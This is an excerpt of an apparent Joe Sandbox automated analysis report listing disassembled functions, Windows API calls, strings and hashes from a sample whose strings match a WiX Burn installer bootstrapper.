                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000), ref: 007D57D9
                                                                                                                                                              • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 007D5833
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to initialize COM on cache thread., xrefs: 007D57E5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeUninitialize
                                                                                                                                                              • String ID: Failed to initialize COM on cache thread.
                                                                                                                                                              • API String ID: 3442037557-3629645316
                                                                                                                                                              • Opcode ID: 0464ddc64eee5c21e2505afd485b14824d5c4818bc1cfb54f1fe2696c59ae840
                                                                                                                                                              • Instruction ID: 28da17a61a4747317a0e1b2cf74ef55eb4fccd2bc99cd1ab48f9cf2d872d8f1e
                                                                                                                                                              • Opcode Fuzzy Hash: 0464ddc64eee5c21e2505afd485b14824d5c4818bc1cfb54f1fe2696c59ae840
                                                                                                                                                              • Instruction Fuzzy Hash: 15015772600619FFCB059BA9D884EDAFBACFF08350B108126FA09D7221DB30AD549B90
                                                                                                                                                              Function 00803BF1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,00803A8E,?), ref: 00803C62
                                                                                                                                                              Strings
                                                                                                                                                              • EnableLUA, xrefs: 00803C34
                                                                                                                                                              • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00803C0C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpen
                                                                                                                                                              • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                                                                                                                                              • API String ID: 47109696-3551287084
                                                                                                                                                              • Opcode ID: 1cd27886e5a7d44ce4425730a257e5bff6992c9dd9c12e3e58d1f11b9d2423cf
                                                                                                                                                              • Instruction ID: 4d340fbfed7b1b396a8b8f1646557f07871b6533ee12cd7ad7211b59232a2849
                                                                                                                                                              • Opcode Fuzzy Hash: 1cd27886e5a7d44ce4425730a257e5bff6992c9dd9c12e3e58d1f11b9d2423cf
                                                                                                                                                              • Instruction Fuzzy Hash: FF017C32910239FBE7609AA4DC0ABAEF6ACFB14721F2041A5A900F3191E3755F9096D0
                                                                                                                                                              Function 007C5123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,007C1104,?,?,00000000), ref: 007C5142
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,007C1104,?,?,00000000), ref: 007C5172
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareStringlstrlen
                                                                                                                                                              • String ID: burn.clean.room
                                                                                                                                                              • API String ID: 1433953587-3055529264
                                                                                                                                                              • Opcode ID: e25230d31838cf878794d6c39385a5e2461c8871ee367f18af11b37285675f8f
                                                                                                                                                              • Instruction ID: 9437ef0f1495c652bf487b1c67a70510640e00705a9d7f66e998ee85dd8b379c
                                                                                                                                                              • Opcode Fuzzy Hash: e25230d31838cf878794d6c39385a5e2461c8871ee367f18af11b37285675f8f
                                                                                                                                                              • Instruction Fuzzy Hash: 0F0162729006286F87344B499D89F73B7ADFF15BA0B14811EF506C3610D376AC81C7A2
                                                                                                                                                              Function 00806920 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00806985
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeString
                                                                                                                                                              • String ID: `<u$atomutil.cpp
                                                                                                                                                              • API String ID: 3341692771-4051019476
                                                                                                                                                              • Opcode ID: a7d3f1632714fa855288816d1dedbe4bcab3d666d3b28e3196039b75190d83d9
                                                                                                                                                              • Instruction ID: f3a54999a73f5854eeed4eae0e5b7cc0f401c5461e21c7b760e7085bcf2c2442
                                                                                                                                                              • Opcode Fuzzy Hash: a7d3f1632714fa855288816d1dedbe4bcab3d666d3b28e3196039b75190d83d9
                                                                                                                                                              • Instruction Fuzzy Hash: 3501D632500118FBC7615A989C06FAEFBB9FF44B30F244159B800E65D0A7764E31D6E1
                                                                                                                                                              Function 007C6522 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 007C6534
                                                                                                                                                                • Part of subcall function 00800ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,007C5EB2,00000000), ref: 00800AE0
                                                                                                                                                                • Part of subcall function 00800ACC: GetProcAddress.KERNEL32(00000000), ref: 00800AE7
                                                                                                                                                                • Part of subcall function 00800ACC: GetLastError.KERNEL32(?,?,?,007C5EB2,00000000), ref: 00800AFE
                                                                                                                                                                • Part of subcall function 007C5CE2: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 007C5D68
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to get 64-bit folder., xrefs: 007C6557
                                                                                                                                                              • Failed to set variant value., xrefs: 007C6571
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                              • String ID: Failed to get 64-bit folder.$Failed to set variant value.
                                                                                                                                                              • API String ID: 3109562764-2681622189
                                                                                                                                                              • Opcode ID: 591fe7d531d4b9572dc46e0d97efce67910cdf88fdf1df432c2841a9b9e62753
                                                                                                                                                              • Instruction ID: 351f97cb894073a869782db029fcb97e17b05ee76c6cec201e995c55174f6812
                                                                                                                                                              • Opcode Fuzzy Hash: 591fe7d531d4b9572dc46e0d97efce67910cdf88fdf1df432c2841a9b9e62753
                                                                                                                                                              • Instruction Fuzzy Hash: 07018F32D01228BBCB21AB94DC06E9EBB78FF04720F204159B800A6184D7759F609BD1
                                                                                                                                                              Function 007C33C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,007C10DD,?,00000000), ref: 007C33E8
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,007C10DD,?,00000000), ref: 007C33FF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                                                                              • String ID: pathutil.cpp
                                                                                                                                                              • API String ID: 2776309574-741606033
                                                                                                                                                              • Opcode ID: 5ca5c6770efe9c03029f3a57c19f17852ce466c2987aae5ee8af059060268916
                                                                                                                                                              • Instruction ID: 56d35cc3dc91c6556bfb0d5b284f030e398edc2ae7c5c29af2234ade4b3d5eec
                                                                                                                                                              • Opcode Fuzzy Hash: 5ca5c6770efe9c03029f3a57c19f17852ce466c2987aae5ee8af059060268916
                                                                                                                                                              • Instruction Fuzzy Hash: 35F0C273A41571A7C73256965C49F9BFB58EB46B70B16813DFD04FB240DA69DE0082F0
                                                                                                                                                              Function 007EE30F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 007EEBD2
                                                                                                                                                                • Part of subcall function 007F1380: RaiseException.KERNEL32(?,?,?,007EEBF4,?,00000000,00000000,?,?,?,?,?,007EEBF4,?,00827EC8), ref: 007F13DF
                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 007EEBEF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                              • String ID: Unknown exception
                                                                                                                                                              • API String ID: 3476068407-410509341
                                                                                                                                                              • Opcode ID: 2114cc3b1ea8dcec90faedb883fc2cbab229301f7a1124c4120e55596843a7f0
                                                                                                                                                              • Instruction ID: 0443de77a4cf2b002ba007a9e0403b525ccb4d37ec0445ea4edd27be4ede6528
                                                                                                                                                              • Opcode Fuzzy Hash: 2114cc3b1ea8dcec90faedb883fc2cbab229301f7a1124c4120e55596843a7f0
                                                                                                                                                              • Instruction Fuzzy Hash: 91F0287580120CF7CB00BAA6E80AD6D332CAE04310B904960F924D25D1EB38E955C5D0
                                                                                                                                                              Function 00804A05 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,00000000,00000000,74DF34C0,?,?,?,007CBA1D,?,?,?,00000000,00000000), ref: 00804A1D
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,007CBA1D,?,?,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00804A27
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastSize
                                                                                                                                                              • String ID: fileutil.cpp
                                                                                                                                                              • API String ID: 464720113-2967768451
                                                                                                                                                              • Opcode ID: efd8b2a1e6a563236b007dccbefb9595427851e3dd4a03aeadbdbf1f6a13a3b0
                                                                                                                                                              • Instruction ID: 1c5db9aaa9eb852185623ddfaf1b4dba0f021056795c2141be5bbb7b5bec112e
                                                                                                                                                              • Opcode Fuzzy Hash: efd8b2a1e6a563236b007dccbefb9595427851e3dd4a03aeadbdbf1f6a13a3b0
                                                                                                                                                              • Instruction Fuzzy Hash: 67F08CB2A8023AABD7209B899D0595AFBACFF44B20B01411ABE44E7340E770AD1087E4
                                                                                                                                                              Function 00800E07 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00800E28
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc
                                                                                                                                                              • String ID: AdvApi32.dll$RegDeleteKeyExW
                                                                                                                                                              • API String ID: 190572456-850864035
                                                                                                                                                              • Opcode ID: 77b704941546958e6e80ab821b25ed23fde9b95263081c85c7c0999ef74330f9
                                                                                                                                                              • Instruction ID: 47201b6a8bf98d234c50b4a9ecc798277ecdfda060d8ee57b4ea432e341c7fce
                                                                                                                                                              • Opcode Fuzzy Hash: 77b704941546958e6e80ab821b25ed23fde9b95263081c85c7c0999ef74330f9
                                                                                                                                                              • Instruction Fuzzy Hash: 0CE0EC715032619BC7719B14FC09B417F91F731B58F04C125E415EA6B0D3BA4891CF90

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 00A01070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 78fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00A033C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,00A010DD,?,00000000), ref: 00A033E8
                                                                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 00A010F6
                                                                                                                                                                • Part of subcall function 00A01175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00A0111A,cabinet.dll,00000009,?,?,00000000), ref: 00A01186
                                                                                                                                                                • Part of subcall function 00A01175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,00A0111A,cabinet.dll,00000009,?,?,00000000), ref: 00A01191
                                                                                                                                                                • Part of subcall function 00A01175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A0119F
                                                                                                                                                                • Part of subcall function 00A01175: GetLastError.KERNEL32(?,?,?,?,?,00A0111A,cabinet.dll,00000009,?,?,00000000), ref: 00A011BA
                                                                                                                                                                • Part of subcall function 00A01175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A011C2
                                                                                                                                                                • Part of subcall function 00A01175: GetLastError.KERNEL32(?,?,?,?,?,00A0111A,cabinet.dll,00000009,?,?,00000000), ref: 00A011D7
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00A4B4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00A01131
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                                                                                                                              • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                                                                                                                              • API String ID: 3687706282-3151496603
                                                                                                                                                              • Opcode ID: 5dfb236f7705cff101f6803545b51e7d84bcea58a6f84d3197ba9b72b7342c4a
                                                                                                                                                              • Instruction ID: 2317cdf8f43bda91ab1380d0896b73d1741a0d1ba823c40b453edf962c23f1c4
                                                                                                                                                              • Opcode Fuzzy Hash: 5dfb236f7705cff101f6803545b51e7d84bcea58a6f84d3197ba9b72b7342c4a
                                                                                                                                                              • Instruction Fuzzy Hash: F0218075D1021CABCB10DFB4ED45BDEBBB8AB89720F104219EA11B72C1D7709904CBB0
                                                                                                                                                              Function 00A3FEC6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132threadtimeCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(00A6B5FC,00000000,?,?,?,?,00A1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00A3FEF4
                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,00A1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00A3FF04
                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00A3FF0D
                                                                                                                                                              • GetLocalTime.KERNEL32(8000FFFF,?,00A1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00A3FF23
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00A6B5FC,00A1E93B,?,00000000,0000FDE9,?,00A1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00A4001A
                                                                                                                                                              Strings
                                                                                                                                                              • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 00A3FFC0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                                                              • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
                                                                                                                                                              • API String ID: 296830338-59366893
                                                                                                                                                              • Opcode ID: 54ff186a35fa97c9c682bb58e3a98f72cd2c11b9781f849a1467d731a7738848
                                                                                                                                                              • Instruction ID: 6b64ad13c3a27b9e6c3c7532a0fc69f19b271c389622eb71746affeb77b0cbd2
                                                                                                                                                              • Opcode Fuzzy Hash: 54ff186a35fa97c9c682bb58e3a98f72cd2c11b9781f849a1467d731a7738848
                                                                                                                                                              • Instruction Fuzzy Hash: 13416E79D11219AFDB21DFE8DD05ABEB7B8EB88B11F000525F901E6290D7358D81DBA1
                                                                                                                                                              Function 00A1A0BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to calculate working folder to ensure it exists., xrefs: 00A1A0D8
                                                                                                                                                              • Failed create working folder., xrefs: 00A1A0EE
                                                                                                                                                              • Failed to copy working folder., xrefs: 00A1A116
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentDirectoryErrorLastProcessWindows
                                                                                                                                                              • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                                                                                                                              • API String ID: 3841436932-2072961686
                                                                                                                                                              • Opcode ID: cc7bdd57f81a9a20f7325ade880479e901bbc34fd974065ff52f522c8d061e12
                                                                                                                                                              • Instruction ID: 1092be10da9af8c068bc3381324924adf18c06c6048e3c73692c33d0443dfd7f
                                                                                                                                                              • Opcode Fuzzy Hash: cc7bdd57f81a9a20f7325ade880479e901bbc34fd974065ff52f522c8d061e12
                                                                                                                                                              • Instruction Fuzzy Hash: B0018832D02528F78B225B59DD06CDEBB79EF94721B504355F80076111DB319E40A691
                                                                                                                                                              Function 00A0DF33 Relevance: 126.6, APIs: 11, Strings: 61, Instructions: 646COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00A0E058
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00A0E736
                                                                                                                                                                • Part of subcall function 00A0394F: GetProcessHeap.KERNEL32(?,?,?,00A02274,?,00000001,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000,00000000,8000FFFF), ref: 00A03960
                                                                                                                                                                • Part of subcall function 00A0394F: RtlAllocateHeap.NTDLL(00000000,?,00A02274,?,00000001,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000,00000000,8000FFFF), ref: 00A03967
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeHeapString$AllocateProcess
